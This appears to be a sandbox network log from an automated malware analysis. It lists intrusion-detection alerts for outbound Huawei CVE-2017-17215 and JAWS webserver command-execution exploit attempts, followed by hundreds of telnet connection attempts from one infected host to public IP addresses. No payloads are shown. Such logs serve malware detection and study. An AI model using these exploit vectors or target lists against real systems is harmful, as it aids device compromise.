                            06/10/24-15:37:59.869779TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5677880192.168.2.13124.198.230.56
                            06/10/24-15:38:02.905259TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3982237215192.168.2.13197.213.44.111
                            06/10/24-15:38:00.217260TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4138437215192.168.2.13156.203.151.228
                            06/10/24-15:38:00.213146TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4487437215192.168.2.13197.126.47.34
                            06/10/24-15:38:02.830775TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3717437215192.168.2.1341.72.64.165
                            06/10/24-15:38:02.314721TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution3714080192.168.2.13150.107.191.158
                            06/10/24-15:38:02.511176TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5627437215192.168.2.1341.179.65.119
                            06/10/24-15:38:00.268899TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3641637215192.168.2.13197.63.12.46
                            06/10/24-15:38:02.639864TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5121437215192.168.2.1341.253.166.204
                            06/10/24-15:37:59.923381TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6088237215192.168.2.1341.1.16.245
                            06/10/24-15:37:59.938715TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4563637215192.168.2.13197.11.121.199
                            06/10/24-15:38:02.205083TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4261280192.168.2.1386.184.181.185
                            06/10/24-15:38:02.186823TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5840280192.168.2.13148.107.14.82
                            06/10/24-15:38:00.186102TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5328037215192.168.2.13156.226.178.21
                            06/10/24-15:38:00.243948TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3851637215192.168.2.13197.161.103.248
                            06/10/24-15:38:02.652273TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3533237215192.168.2.13197.92.239.151
                            06/10/24-15:38:02.936119TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4732837215192.168.2.13156.49.85.159
                            06/10/24-15:38:02.702109TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4472237215192.168.2.13156.243.126.82
                            06/10/24-15:38:00.031359TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5214237215192.168.2.13197.94.187.63
                            06/10/24-15:37:59.947535TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3989437215192.168.2.13197.56.205.250
                            06/10/24-15:38:00.029895TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3342637215192.168.2.1341.199.166.65
                            06/10/24-15:38:02.509844TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4956037215192.168.2.13197.146.88.253
                            06/10/24-15:38:00.018435TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3545237215192.168.2.13197.116.197.156
                            06/10/24-15:38:02.504959TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3486037215192.168.2.1341.245.146.76
                            06/10/24-15:38:02.738142TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4486637215192.168.2.13156.111.149.77
                            06/10/24-15:38:00.196297TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4894237215192.168.2.13197.159.13.233
                            06/10/24-15:38:02.644240TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5045037215192.168.2.1341.237.168.85
                            06/10/24-15:38:02.174641TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5494080192.168.2.13195.117.82.212
                            06/10/24-15:38:02.107738TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution3873680192.168.2.1331.59.193.253
                            06/10/24-15:38:02.839299TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5741237215192.168.2.13197.106.115.54
                            06/10/24-15:38:00.219730TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4659437215192.168.2.1341.228.140.97
                            06/10/24-15:38:02.831855TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4901437215192.168.2.1341.139.202.223
                            06/10/24-15:38:00.005516TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5302637215192.168.2.13197.57.68.100
                            06/10/24-15:38:00.184599TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5999837215192.168.2.1341.122.109.42
                            06/10/24-15:38:02.108388TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5804280192.168.2.13120.80.140.214
                            06/10/24-15:37:59.989479TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5850237215192.168.2.13197.156.129.89
                            06/10/24-15:38:00.205114TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4311637215192.168.2.1341.237.191.106
                            06/10/24-15:38:02.103189TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5412680192.168.2.13153.123.46.180
                            06/10/24-15:37:59.804504TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution3595880192.168.2.13158.214.75.80
                            06/10/24-15:38:00.206692TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4767637215192.168.2.1341.39.55.229
                            06/10/24-15:38:00.260140TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4614237215192.168.2.1341.112.119.1
                            06/10/24-15:38:02.508359TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5833037215192.168.2.13197.240.30.85
                            06/10/24-15:38:00.247270TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5975237215192.168.2.1341.215.9.130
                            TimestampSource PortDest PortSource IPDest IP
                            Jun 10, 2024 15:37:58.433140039 CEST2604923192.168.2.1396.177.106.95
                            Jun 10, 2024 15:37:58.433172941 CEST2604923192.168.2.13173.87.116.193
                            Jun 10, 2024 15:37:58.433187008 CEST2604923192.168.2.13135.237.201.13
                            Jun 10, 2024 15:37:58.433192015 CEST2604923192.168.2.1351.4.201.163
                            Jun 10, 2024 15:37:58.433208942 CEST2604923192.168.2.13125.212.207.230
                            Jun 10, 2024 15:37:58.433207989 CEST2604923192.168.2.1332.204.162.123
                            Jun 10, 2024 15:37:58.433217049 CEST2604923192.168.2.13213.79.9.22
                            Jun 10, 2024 15:37:58.433243036 CEST2604923192.168.2.13107.185.45.46
                            Jun 10, 2024 15:37:58.433278084 CEST2604923192.168.2.13114.149.158.173
                            Jun 10, 2024 15:37:58.433278084 CEST2604923192.168.2.1368.161.203.180
                            Jun 10, 2024 15:37:58.433307886 CEST2604923192.168.2.13132.215.221.250
                            Jun 10, 2024 15:37:58.433309078 CEST2604923192.168.2.13146.77.88.171
                            Jun 10, 2024 15:37:58.433317900 CEST2604923192.168.2.13218.209.158.189
                            Jun 10, 2024 15:37:58.433331966 CEST2604923192.168.2.1318.181.89.22
                            Jun 10, 2024 15:37:58.433331966 CEST2604923192.168.2.13222.55.142.174
                            Jun 10, 2024 15:37:58.433357954 CEST2604923192.168.2.1387.202.96.40
                            Jun 10, 2024 15:37:58.433363914 CEST2604923192.168.2.13186.246.195.187
                            Jun 10, 2024 15:37:58.433372974 CEST2604923192.168.2.1393.190.24.11
                            Jun 10, 2024 15:37:58.433376074 CEST2604923192.168.2.13163.160.54.54
                            Jun 10, 2024 15:37:58.433409929 CEST2604923192.168.2.13172.136.165.150
                            Jun 10, 2024 15:37:58.433420897 CEST2604923192.168.2.1332.199.108.90
                            Jun 10, 2024 15:37:58.433458090 CEST2604923192.168.2.13181.116.62.108
                            Jun 10, 2024 15:37:58.433491945 CEST2604923192.168.2.13110.210.8.107
                            Jun 10, 2024 15:37:58.433491945 CEST2604923192.168.2.1350.0.195.92
                            Jun 10, 2024 15:37:58.433521032 CEST2604923192.168.2.13164.60.105.204
                            Jun 10, 2024 15:37:58.433549881 CEST2604923192.168.2.13144.47.107.187
                            Jun 10, 2024 15:37:58.433549881 CEST2604923192.168.2.13101.0.241.188
                            Jun 10, 2024 15:37:58.433552980 CEST2604923192.168.2.1345.211.194.205
                            Jun 10, 2024 15:37:58.433568954 CEST2604923192.168.2.13122.156.84.221
                            Jun 10, 2024 15:37:58.433569908 CEST2604923192.168.2.1379.64.51.144
                            Jun 10, 2024 15:37:58.433578968 CEST2604923192.168.2.134.146.12.76
                            Jun 10, 2024 15:37:58.433588982 CEST2604923192.168.2.1391.118.235.84
                            Jun 10, 2024 15:37:58.433598042 CEST2604923192.168.2.13117.7.158.134
                            Jun 10, 2024 15:37:58.433619022 CEST2604923192.168.2.13153.63.20.187
                            Jun 10, 2024 15:37:58.433619022 CEST2604923192.168.2.1318.63.185.184
                            Jun 10, 2024 15:37:58.433646917 CEST2604923192.168.2.1372.115.76.96
                            Jun 10, 2024 15:37:58.433653116 CEST2604923192.168.2.13174.41.100.150
                            Jun 10, 2024 15:37:58.433655024 CEST2604923192.168.2.1352.34.186.234
                            Jun 10, 2024 15:37:58.433666945 CEST2604923192.168.2.13174.5.116.14
                            Jun 10, 2024 15:37:58.433670998 CEST2604923192.168.2.13112.8.190.180
                            Jun 10, 2024 15:37:58.433679104 CEST2604923192.168.2.13118.103.225.24
                            Jun 10, 2024 15:37:58.433687925 CEST2604923192.168.2.1317.149.191.92
                            Jun 10, 2024 15:37:58.433712006 CEST2604923192.168.2.13205.253.14.196
                            Jun 10, 2024 15:37:58.433720112 CEST2604923192.168.2.13101.64.143.75
                            Jun 10, 2024 15:37:58.433720112 CEST2604923192.168.2.13105.66.169.159
                            Jun 10, 2024 15:37:58.433722973 CEST2604923192.168.2.1385.10.50.135
                            Jun 10, 2024 15:37:58.433763981 CEST2604923192.168.2.13150.168.58.113
                            Jun 10, 2024 15:37:58.433772087 CEST2604923192.168.2.1399.177.223.89
                            Jun 10, 2024 15:37:58.433772087 CEST2604923192.168.2.13197.107.167.28
                            Jun 10, 2024 15:37:58.433784008 CEST2604923192.168.2.1393.133.135.212
                            Jun 10, 2024 15:37:58.433805943 CEST2604923192.168.2.13130.32.142.3
                            Jun 10, 2024 15:37:58.433816910 CEST2604923192.168.2.13194.114.95.197
                            Jun 10, 2024 15:37:58.433825970 CEST2604923192.168.2.13116.57.103.152
                            Jun 10, 2024 15:37:58.433828115 CEST2604923192.168.2.1371.255.88.187
                            Jun 10, 2024 15:37:58.433840036 CEST2604923192.168.2.13143.24.152.47
                            Jun 10, 2024 15:37:58.433842897 CEST2604923192.168.2.13130.63.23.172
                            Jun 10, 2024 15:37:58.433871031 CEST2604923192.168.2.1340.158.200.103
                            Jun 10, 2024 15:37:58.433882952 CEST2604923192.168.2.13145.110.175.175
                            Jun 10, 2024 15:37:58.433891058 CEST2604923192.168.2.13177.57.136.238
                            Jun 10, 2024 15:37:58.433907032 CEST2604923192.168.2.139.123.70.97
                            Jun 10, 2024 15:37:58.433916092 CEST2604923192.168.2.13103.49.44.0
                            Jun 10, 2024 15:37:58.433923960 CEST2604923192.168.2.13141.254.243.59
                            Jun 10, 2024 15:37:58.433931112 CEST2604923192.168.2.13178.112.24.109
                            Jun 10, 2024 15:37:58.433936119 CEST2604923192.168.2.13161.223.29.209
                            Jun 10, 2024 15:37:58.433936119 CEST2604923192.168.2.1385.191.23.41
                            Jun 10, 2024 15:37:58.433955908 CEST2604923192.168.2.13183.72.192.189
                            Jun 10, 2024 15:37:58.433968067 CEST2604923192.168.2.1348.238.160.167
                            Jun 10, 2024 15:37:58.433970928 CEST2604923192.168.2.13117.118.248.143
                            Jun 10, 2024 15:37:58.433975935 CEST2604923192.168.2.13126.154.176.146
                            Jun 10, 2024 15:37:58.433996916 CEST2604923192.168.2.13187.195.80.142
                            Jun 10, 2024 15:37:58.433996916 CEST2604923192.168.2.1376.165.180.163
                            Jun 10, 2024 15:37:58.433998108 CEST2604923192.168.2.13217.177.129.226
                            Jun 10, 2024 15:37:58.434021950 CEST2604923192.168.2.1313.140.175.29
                            Jun 10, 2024 15:37:58.434034109 CEST2604923192.168.2.1369.167.90.241
                            Jun 10, 2024 15:37:58.434061050 CEST2604923192.168.2.1381.151.185.7
                            Jun 10, 2024 15:37:58.434077024 CEST2604923192.168.2.1368.155.180.148
                            Jun 10, 2024 15:37:58.434082031 CEST2604923192.168.2.1351.148.234.23
                            Jun 10, 2024 15:37:58.434082031 CEST2604923192.168.2.13175.241.195.149
                            Jun 10, 2024 15:37:58.434092999 CEST2604923192.168.2.13101.140.61.30
                            Jun 10, 2024 15:37:58.434098005 CEST2604923192.168.2.13137.246.157.211
                            Jun 10, 2024 15:37:58.434099913 CEST2604923192.168.2.13210.61.135.33
                            Jun 10, 2024 15:37:58.434111118 CEST2604923192.168.2.1366.78.100.75
                            Jun 10, 2024 15:37:58.434123039 CEST2604923192.168.2.1363.172.158.231
                            Jun 10, 2024 15:37:58.434129000 CEST2604923192.168.2.13121.35.12.55
                            Jun 10, 2024 15:37:58.434132099 CEST2604923192.168.2.13193.201.9.72
                            Jun 10, 2024 15:37:58.434153080 CEST2604923192.168.2.1346.243.129.164
                            Jun 10, 2024 15:37:58.434163094 CEST2604923192.168.2.13210.25.137.32
                            Jun 10, 2024 15:37:58.434179068 CEST2604923192.168.2.13180.53.80.121
                            Jun 10, 2024 15:37:58.434185028 CEST2604923192.168.2.13147.160.137.115
                            Jun 10, 2024 15:37:58.434185028 CEST2604923192.168.2.13219.181.2.23
                            Jun 10, 2024 15:37:58.434185982 CEST2604923192.168.2.13142.123.119.101
                            Jun 10, 2024 15:37:58.434197903 CEST2604923192.168.2.13200.53.128.206
                            Jun 10, 2024 15:37:58.434201956 CEST2604923192.168.2.1394.9.59.175
                            Jun 10, 2024 15:37:58.434233904 CEST2604923192.168.2.13199.226.110.185
                            Jun 10, 2024 15:37:58.434236050 CEST2604923192.168.2.1343.44.29.202
                            Jun 10, 2024 15:37:58.434267998 CEST2604923192.168.2.1390.140.146.124
                            Jun 10, 2024 15:37:58.434267998 CEST2604923192.168.2.1394.209.92.63
                            Jun 10, 2024 15:37:58.434273005 CEST2604923192.168.2.1399.89.233.159
                            Jun 10, 2024 15:37:58.434278011 CEST2604923192.168.2.13187.166.197.228
                            Jun 10, 2024 15:37:58.434278011 CEST2604923192.168.2.131.225.63.72
                            Jun 10, 2024 15:37:58.434307098 CEST2604923192.168.2.139.251.204.255
                            Jun 10, 2024 15:37:58.434318066 CEST2604923192.168.2.1392.251.195.242
                            Jun 10, 2024 15:37:58.434350014 CEST2604923192.168.2.1395.26.230.125
                            Jun 10, 2024 15:37:58.434361935 CEST2604923192.168.2.1395.99.108.48
                            Jun 10, 2024 15:37:58.434375048 CEST2604923192.168.2.1381.34.197.205
                            Jun 10, 2024 15:37:58.434401989 CEST2604923192.168.2.1370.29.10.141
                            Jun 10, 2024 15:37:58.434405088 CEST2604923192.168.2.1383.193.101.13
                            Jun 10, 2024 15:37:58.434405088 CEST2604923192.168.2.1365.255.104.204
                            Jun 10, 2024 15:37:58.434405088 CEST2604923192.168.2.13133.203.197.14
                            Jun 10, 2024 15:37:58.434405088 CEST2604923192.168.2.1364.180.44.114
                            Jun 10, 2024 15:37:58.434449911 CEST2604923192.168.2.13192.172.175.62
                            Jun 10, 2024 15:37:58.434453964 CEST2604923192.168.2.13150.101.3.213
                            Jun 10, 2024 15:37:58.434456110 CEST2604923192.168.2.1377.190.186.11
                            Jun 10, 2024 15:37:58.434477091 CEST2604923192.168.2.1343.149.242.73
                            Jun 10, 2024 15:37:58.434478045 CEST2604923192.168.2.13176.89.11.89
                            Jun 10, 2024 15:37:58.434501886 CEST2604923192.168.2.13186.111.25.115
                            Jun 10, 2024 15:37:58.434509993 CEST2604923192.168.2.1383.49.85.75
                            Jun 10, 2024 15:37:58.434518099 CEST2604923192.168.2.13183.90.133.243
                            Jun 10, 2024 15:37:58.434529066 CEST2604923192.168.2.1371.51.98.100
                            Jun 10, 2024 15:37:58.434559107 CEST2604923192.168.2.13109.12.126.152
                            Jun 10, 2024 15:37:58.434606075 CEST2604923192.168.2.13115.162.142.239
                            Jun 10, 2024 15:37:58.434606075 CEST2604923192.168.2.13145.235.64.90
                            Jun 10, 2024 15:37:58.434606075 CEST2604923192.168.2.1312.96.189.43
                            Jun 10, 2024 15:37:58.434609890 CEST2604923192.168.2.13177.121.24.4
                            Jun 10, 2024 15:37:58.434609890 CEST2604923192.168.2.13119.80.226.193
                            Jun 10, 2024 15:37:58.434612036 CEST2604923192.168.2.13168.182.53.74
                            Jun 10, 2024 15:37:58.434616089 CEST2604923192.168.2.1339.244.108.92
                            Jun 10, 2024 15:37:58.434617043 CEST2604923192.168.2.1340.181.124.64
                            Jun 10, 2024 15:37:58.434612036 CEST2604923192.168.2.13126.212.72.53
                            Jun 10, 2024 15:37:58.434617043 CEST2604923192.168.2.1373.128.187.229
                            Jun 10, 2024 15:37:58.434623003 CEST2604923192.168.2.13163.136.163.39
                            Jun 10, 2024 15:37:58.434623003 CEST2604923192.168.2.13129.5.134.10
                            Jun 10, 2024 15:37:58.434623957 CEST2604923192.168.2.1375.111.13.174
                            Jun 10, 2024 15:37:58.434623957 CEST2604923192.168.2.1364.206.91.150
                            Jun 10, 2024 15:37:58.434623957 CEST2604923192.168.2.13178.117.4.9
                            Jun 10, 2024 15:37:58.434628010 CEST2604923192.168.2.13210.218.97.240
                            Jun 10, 2024 15:37:58.434628010 CEST2604923192.168.2.13139.178.63.163
                            Jun 10, 2024 15:37:58.434632063 CEST2604923192.168.2.1354.112.148.57
                            Jun 10, 2024 15:37:58.434643030 CEST2604923192.168.2.1347.64.82.110
                            Jun 10, 2024 15:37:58.434686899 CEST2604923192.168.2.1381.203.246.213
                            Jun 10, 2024 15:37:58.434688091 CEST2604923192.168.2.13129.61.85.218
                            Jun 10, 2024 15:37:58.434688091 CEST2604923192.168.2.1317.196.46.220
                            Jun 10, 2024 15:37:58.434689045 CEST2604923192.168.2.1378.219.247.77
                            Jun 10, 2024 15:37:58.434689045 CEST2604923192.168.2.13204.252.177.146
                            Jun 10, 2024 15:37:58.434689999 CEST2604923192.168.2.132.227.96.19
                            Jun 10, 2024 15:37:58.434695959 CEST2604923192.168.2.1344.24.228.100
                            Jun 10, 2024 15:37:58.434696913 CEST2604923192.168.2.13172.251.219.162
                            Jun 10, 2024 15:37:58.434696913 CEST2604923192.168.2.13219.64.103.148
                            Jun 10, 2024 15:37:58.434705973 CEST2604923192.168.2.13129.1.232.147
                            Jun 10, 2024 15:37:58.434705973 CEST2604923192.168.2.1387.91.50.50
                            Jun 10, 2024 15:37:58.434725046 CEST2604923192.168.2.13187.164.122.146
                            Jun 10, 2024 15:37:58.434730053 CEST2604923192.168.2.1353.44.231.121
                            Jun 10, 2024 15:37:58.434732914 CEST2604923192.168.2.13195.177.175.168
                            Jun 10, 2024 15:37:58.434797049 CEST2604923192.168.2.13113.70.245.112
                            Jun 10, 2024 15:37:58.434797049 CEST2604923192.168.2.13158.180.163.146
                            Jun 10, 2024 15:37:58.434803009 CEST2604923192.168.2.13177.124.207.36
                            Jun 10, 2024 15:37:58.434803009 CEST2604923192.168.2.13103.235.177.65
                            Jun 10, 2024 15:37:58.434807062 CEST2604923192.168.2.13196.138.102.143
                            Jun 10, 2024 15:37:58.434808016 CEST2604923192.168.2.13130.203.207.74
                            Jun 10, 2024 15:37:58.434808016 CEST2604923192.168.2.13195.78.80.168
                            Jun 10, 2024 15:37:58.434807062 CEST2604923192.168.2.13184.139.198.55
                            Jun 10, 2024 15:37:58.434808016 CEST2604923192.168.2.1376.245.198.79
                            Jun 10, 2024 15:37:58.434811115 CEST2604923192.168.2.1342.248.223.37
                            Jun 10, 2024 15:37:58.434811115 CEST2604923192.168.2.13128.34.202.198
                            Jun 10, 2024 15:37:58.434811115 CEST2604923192.168.2.1381.69.232.84
                            Jun 10, 2024 15:37:58.434829950 CEST2604923192.168.2.13198.104.42.140
                            Jun 10, 2024 15:37:58.434847116 CEST2604923192.168.2.13184.246.128.197
                            Jun 10, 2024 15:37:58.434859991 CEST2604923192.168.2.13193.21.139.55
                            Jun 10, 2024 15:37:58.434919119 CEST2604923192.168.2.13100.234.162.220
                            Jun 10, 2024 15:37:58.434926987 CEST2604923192.168.2.13213.201.114.39
                            Jun 10, 2024 15:37:58.434936047 CEST2604923192.168.2.1351.172.195.120
                            Jun 10, 2024 15:37:58.434952974 CEST2604923192.168.2.1319.171.194.70
                            Jun 10, 2024 15:37:58.434952974 CEST2604923192.168.2.13209.203.9.212
                            Jun 10, 2024 15:37:58.434952974 CEST2604923192.168.2.13173.64.113.198
                            Jun 10, 2024 15:37:58.434967995 CEST2604923192.168.2.13222.49.219.68
                            Jun 10, 2024 15:37:58.434994936 CEST2604923192.168.2.13109.179.33.126
                            Jun 10, 2024 15:37:58.435005903 CEST2604923192.168.2.1367.134.100.140
                            Jun 10, 2024 15:37:58.435013056 CEST2604923192.168.2.1364.243.40.90
                            Jun 10, 2024 15:37:58.435026884 CEST2604923192.168.2.13109.27.120.27
                            Jun 10, 2024 15:37:58.435043097 CEST2604923192.168.2.1351.225.51.243
                            Jun 10, 2024 15:37:58.435046911 CEST2604923192.168.2.132.170.129.148
                            Jun 10, 2024 15:37:58.435062885 CEST2604923192.168.2.13159.151.153.238
                            Jun 10, 2024 15:37:58.435067892 CEST2604923192.168.2.13218.213.241.4
                            Jun 10, 2024 15:37:58.435079098 CEST2604923192.168.2.1312.6.102.138
                            Jun 10, 2024 15:37:58.435101032 CEST2604923192.168.2.13154.215.49.136
                            Jun 10, 2024 15:37:58.435110092 CEST2604923192.168.2.131.94.235.162
                            Jun 10, 2024 15:37:58.435120106 CEST2604923192.168.2.13201.156.109.172
                            Jun 10, 2024 15:37:58.435127974 CEST2604923192.168.2.13100.243.106.29
                            Jun 10, 2024 15:37:58.435188055 CEST2604923192.168.2.13176.246.218.70
                            Jun 10, 2024 15:37:58.435188055 CEST2604923192.168.2.1373.48.242.43
                            Jun 10, 2024 15:37:58.435194016 CEST2604923192.168.2.13165.169.236.37
                            Jun 10, 2024 15:37:58.435194969 CEST2604923192.168.2.1366.162.164.149
                            Jun 10, 2024 15:37:58.435194969 CEST2604923192.168.2.1317.109.242.86
                            Jun 10, 2024 15:37:58.435194969 CEST2604923192.168.2.13206.246.110.71
                            Jun 10, 2024 15:37:58.435204983 CEST2604923192.168.2.1360.46.157.139
                            Jun 10, 2024 15:37:58.435204983 CEST2604923192.168.2.13135.7.37.202
                            Jun 10, 2024 15:37:58.435204983 CEST2604923192.168.2.13151.153.32.7
                            Jun 10, 2024 15:37:58.435205936 CEST2604923192.168.2.13161.145.241.3
                            Jun 10, 2024 15:37:58.435208082 CEST2604923192.168.2.1342.245.217.159
                            Jun 10, 2024 15:37:58.435205936 CEST2604923192.168.2.13223.38.63.221
                            Jun 10, 2024 15:37:58.435208082 CEST2604923192.168.2.13175.163.35.128
                            Jun 10, 2024 15:37:58.435213089 CEST2604923192.168.2.1350.249.166.32
                            Jun 10, 2024 15:37:58.435224056 CEST2604923192.168.2.13206.41.253.202
                            Jun 10, 2024 15:37:58.435224056 CEST2604923192.168.2.1353.226.50.235
                            Jun 10, 2024 15:37:58.435239077 CEST2604923192.168.2.1397.201.9.157
                            Jun 10, 2024 15:37:58.435239077 CEST2604923192.168.2.13120.165.231.131
                            Jun 10, 2024 15:37:58.435239077 CEST2604923192.168.2.13182.171.143.245
                            Jun 10, 2024 15:37:58.435239077 CEST2604923192.168.2.1327.58.154.16
                            Jun 10, 2024 15:37:58.435239077 CEST2604923192.168.2.13138.195.101.109
                            Jun 10, 2024 15:37:58.435245037 CEST2604923192.168.2.13129.59.24.79
                            Jun 10, 2024 15:37:58.435246944 CEST2604923192.168.2.1366.71.95.26
                            Jun 10, 2024 15:37:58.435245037 CEST2604923192.168.2.13189.17.121.152
                            Jun 10, 2024 15:37:58.435250998 CEST2604923192.168.2.13156.1.146.68
                            Jun 10, 2024 15:37:58.435277939 CEST2604923192.168.2.13101.171.225.52
                            Jun 10, 2024 15:37:58.435281038 CEST2604923192.168.2.13202.135.153.253
                            Jun 10, 2024 15:37:58.435292959 CEST2604923192.168.2.1317.204.49.178
                            Jun 10, 2024 15:37:58.435295105 CEST2604923192.168.2.13197.0.46.53
                            Jun 10, 2024 15:37:58.435338974 CEST2604923192.168.2.13108.108.201.21
                            Jun 10, 2024 15:37:58.435359001 CEST2604923192.168.2.139.177.227.195
                            Jun 10, 2024 15:37:58.435364962 CEST2604923192.168.2.13173.53.98.203
                            Jun 10, 2024 15:37:58.435369015 CEST2604923192.168.2.1377.187.147.187
                            Jun 10, 2024 15:37:58.435388088 CEST2604923192.168.2.13164.1.98.179
                            Jun 10, 2024 15:37:58.435396910 CEST2604923192.168.2.1357.70.89.151
                            Jun 10, 2024 15:37:58.435396910 CEST2604923192.168.2.1344.158.131.61
                            Jun 10, 2024 15:37:58.435414076 CEST2604923192.168.2.13208.240.113.197
                            Jun 10, 2024 15:37:58.435435057 CEST2604923192.168.2.13168.177.5.159
                            Jun 10, 2024 15:37:58.435447931 CEST2604923192.168.2.13201.214.98.69
                            Jun 10, 2024 15:37:58.435451984 CEST2604923192.168.2.1336.94.105.34
                            Jun 10, 2024 15:37:58.435455084 CEST2604923192.168.2.1341.192.162.36
                            Jun 10, 2024 15:37:58.435491085 CEST2604923192.168.2.13143.42.68.50
                            Jun 10, 2024 15:37:58.435497046 CEST2604923192.168.2.13198.109.109.221
                            Jun 10, 2024 15:37:58.435497999 CEST2604923192.168.2.13110.162.136.56
                            Jun 10, 2024 15:37:58.435498953 CEST2604923192.168.2.13105.36.61.133
                            Jun 10, 2024 15:37:58.435498953 CEST2604923192.168.2.1344.56.172.81
                            Jun 10, 2024 15:37:58.435511112 CEST2604923192.168.2.1357.92.3.171
                            Jun 10, 2024 15:37:58.435511112 CEST2604923192.168.2.13104.82.175.84
                            Jun 10, 2024 15:37:58.435513973 CEST2604923192.168.2.13173.19.159.245
                            Jun 10, 2024 15:37:58.435530901 CEST2604923192.168.2.13105.27.179.71
                            Jun 10, 2024 15:37:58.435547113 CEST2604923192.168.2.1370.210.54.113
                            Jun 10, 2024 15:37:58.435564041 CEST2604923192.168.2.1346.93.148.61
                            Jun 10, 2024 15:37:58.435564041 CEST2604923192.168.2.13216.62.157.206
                            Jun 10, 2024 15:37:58.435564041 CEST2604923192.168.2.13116.148.59.168
                            Jun 10, 2024 15:37:58.435578108 CEST2604923192.168.2.13115.66.112.224
                            Jun 10, 2024 15:37:58.435580969 CEST2604923192.168.2.13102.60.12.91
                            Jun 10, 2024 15:37:58.435580969 CEST2604923192.168.2.13222.73.198.208
                            Jun 10, 2024 15:37:58.435659885 CEST2604923192.168.2.138.236.126.221
                            Jun 10, 2024 15:37:58.435659885 CEST2604923192.168.2.1393.71.51.69
                            Jun 10, 2024 15:37:58.435659885 CEST2604923192.168.2.13109.37.141.207
                            Jun 10, 2024 15:37:58.435659885 CEST2604923192.168.2.1389.230.57.228
                            Jun 10, 2024 15:37:58.435661077 CEST2604923192.168.2.1325.145.103.52
                            Jun 10, 2024 15:37:58.435659885 CEST2604923192.168.2.1312.246.114.97
                            Jun 10, 2024 15:37:58.435661077 CEST2604923192.168.2.13190.145.163.37
                            Jun 10, 2024 15:37:58.435659885 CEST2604923192.168.2.1342.222.181.188
                            Jun 10, 2024 15:37:58.435662985 CEST2604923192.168.2.1376.123.93.84
                            Jun 10, 2024 15:37:58.435659885 CEST2604923192.168.2.1396.250.118.96
                            Jun 10, 2024 15:37:58.435667992 CEST2604923192.168.2.13183.135.245.200
                            Jun 10, 2024 15:37:58.435664892 CEST2604923192.168.2.1342.235.187.49
                            Jun 10, 2024 15:37:58.435664892 CEST2604923192.168.2.13221.246.224.124
                            Jun 10, 2024 15:37:58.435664892 CEST2604923192.168.2.13119.40.4.36
                            Jun 10, 2024 15:37:58.435671091 CEST2604923192.168.2.1345.206.218.250
                            Jun 10, 2024 15:37:58.435671091 CEST2604923192.168.2.1337.172.34.219
                            Jun 10, 2024 15:37:58.435671091 CEST2604923192.168.2.1357.219.233.84
                            Jun 10, 2024 15:37:58.435671091 CEST2604923192.168.2.1390.173.196.107
                            Jun 10, 2024 15:37:58.435688972 CEST2604923192.168.2.135.16.47.154
                            Jun 10, 2024 15:37:58.435691118 CEST2604923192.168.2.13222.32.137.153
                            Jun 10, 2024 15:37:58.435709000 CEST2604923192.168.2.1365.40.214.71
                            Jun 10, 2024 15:37:58.435709000 CEST2604923192.168.2.13124.88.64.232
                            Jun 10, 2024 15:37:58.435709000 CEST2604923192.168.2.13216.98.67.120
                            Jun 10, 2024 15:37:58.435710907 CEST2604923192.168.2.13155.75.240.185
                            Jun 10, 2024 15:37:58.435717106 CEST2604923192.168.2.13191.255.50.88
                            Jun 10, 2024 15:37:58.435719967 CEST2604923192.168.2.13109.27.109.48
